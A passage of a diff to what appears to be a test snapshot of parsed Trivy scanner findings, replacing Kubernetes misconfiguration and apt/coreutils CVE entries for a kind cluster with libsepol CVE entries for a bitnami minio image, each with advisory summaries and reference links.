"scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://support.apple.com/kb/HT211931", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.pcre.org/original/changelog.txt", }, ], "severity": "LOW", @@ -131631,173 +132603,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], "severity": "LOW", @@ -131805,105 +132726,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-37600", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-37600", - "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", - "https://github.com/karelzak/util-linux/issues/1395", - "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", - "https://security.netapp.com/advisory/ntap-20210902-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-37600", + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-37600", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-37600", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/issues/1395", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], "severity": "LOW", @@ -131911,67 +132849,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.30-3", - "packageName": "coreutils", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, ], "severity": "LOW", @@ -131979,2133 +132972,2279 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.30-3", - "packageName": "coreutils", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", ], }, "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": 